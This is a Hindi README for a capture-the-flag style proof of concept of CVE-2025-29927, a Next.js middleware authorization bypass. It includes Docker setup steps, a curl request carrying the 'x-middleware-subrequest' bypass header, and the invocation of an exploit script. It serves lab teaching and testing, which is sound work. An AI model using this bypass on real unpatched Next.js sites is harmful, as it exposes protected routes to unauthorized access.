
CTF-शैली का प्रमाण-अवधारणा जो CVE-2025-29927 Next.js मिडलवेयर प्राधिकरण बाईपास को प्रदर्शित करता है। इसमें कमजोर Docker एप्लिकेशन और संरक्षित रूट से फ्लैग प्राप्त करने के लिए एक्सप्लॉइट स्क्रिप्ट शामिल है।
यह कैप्चर द फ्लैग (CTF) शैली में Next.js Middleware Authorization Bypass भेद्यता (CVE-2025-29927) के लिए एक प्रूफ ऑफ कॉन्सेप्ट है। इसका उद्देश्य auth middleware को बायपास करके /protected रूट से फ्लैग प्राप्त करना है।
/protected/ पर रीडायरेक्ट किया जाता हैgit clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app
यह कमजोर Next.js ऐप को http://IP:3000 पर शुरू करेगा।
एक्सेस करने का प्रयास करें:
curl -i http://IP:3000/protected
आपको / पर रीडायरेक्ट किया जाएगा।
curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected
प्रदान की गई exploit.py का उपयोग करके middleware को बायपास करें और सुरक्षित रूट तक पहुंचें:
python3 exploit.py -url http://IP:3000
यदि सफल होता है, तो आप /protected से फ्लैग प्राप्त करेंगे।
Dockerfile - कमजोर Next.js एप्लिकेशन बनाता हैexploit.py - auth को बायपास करने के लिए भेद्यता का शोषण करता हैpages/ - कमजोर /protected और /login रूट्स शामिल हैंmiddleware.js - कमजोर middleware तर्कREADME.md - यह फ़ाइलयह PoC केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। इसका उपयोग उन प्रणालियों के खिलाफ न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।
भेद्यता का शोषण करके फ्लैग ढूंढें और एक्सेस करें:
http://IP:3000/protected
शुभकामनाएँ! 🏴☠️